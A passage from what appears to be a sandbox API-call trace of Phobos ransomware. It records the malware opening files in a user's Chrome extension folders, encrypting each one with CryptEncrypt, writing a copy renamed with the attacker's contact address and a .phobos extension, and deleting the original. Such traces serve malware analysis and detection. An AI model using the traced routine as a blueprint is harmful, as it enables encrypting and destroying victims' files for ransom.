data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.354] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.354] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.358] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.358] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.358] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x160, lpOverlapped=0x0) returned 1 [0153.359] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170, dwBufLen=0x170 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170) returned 1 [0153.359] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x170, lpOverlapped=0x0) returned 1 [0153.360] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.360] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.360] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0153.360] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.360] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0153.361] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.361] CloseHandle (hObject=0x138) returned 1 [0153.361] CloseHandle (hObject=0x130) returned 1 [0153.361] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json")) returned 1 [0153.362] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.365] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=11094) returned 1 [0153.365] CloseHandle (hObject=0x130) returned 1 [0153.365] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json")) returned 0x2020 [0153.365] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.365] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.365] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.366] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.366] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.366] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2b56, lpOverlapped=0x0) returned 1 [0153.544] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b60, dwBufLen=0x2b60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b60) returned 1 [0153.545] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2b60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2b60, lpOverlapped=0x0) returned 1 [0153.546] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0153.546] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.546] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0153.546] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0153.546] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0153.546] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.546] CloseHandle (hObject=0x130) returned 1 [0153.546] CloseHandle (hObject=0x138) returned 1 [0153.546] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json")) returned 1 [0153.547] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.548] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=854) returned 1 [0153.548] CloseHandle (hObject=0x138) returned 1 [0153.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json")) returned 0x2020 [0153.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.548] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.548] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.549] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.549] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.549] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x356, lpOverlapped=0x0) returned 1 [0153.602] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x360, dwBufLen=0x360 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x360) returned 1 [0153.602] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x360, lpOverlapped=0x0) returned 1 [0153.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0153.603] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.603] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0153.603] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.603] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0153.603] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.603] CloseHandle (hObject=0x138) returned 1 [0153.603] CloseHandle (hObject=0x130) returned 1 [0153.603] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json")) returned 1 [0153.604] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.605] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1457) returned 1 [0153.605] CloseHandle (hObject=0x130) returned 1 [0153.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json")) returned 0x2020 [0153.605] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.605] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.605] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.605] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.605] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.605] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5b1, lpOverlapped=0x0) returned 1 [0153.952] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5c0, dwBufLen=0x5c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5c0) returned 1 [0153.952] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5c0, lpOverlapped=0x0) returned 1 [0153.967] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0153.967] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.967] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0153.967] CryptDestroyKey (hKey=0xa32d68) returned 1 [0153.967] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0153.967] CryptDestroyKey (hKey=0xa327e8) returned 1 [0153.967] CloseHandle (hObject=0x130) returned 1 [0153.967] CloseHandle (hObject=0x138) returned 1 [0153.967] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json")) returned 1 [0153.968] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0153.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.969] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=224) returned 1 [0153.969] CloseHandle (hObject=0x138) returned 1 [0153.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js")) returned 0x2020 [0153.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0153.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0153.970] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.970] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0153.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\page_embed_script.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0153.970] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0153.970] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0153.970] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, 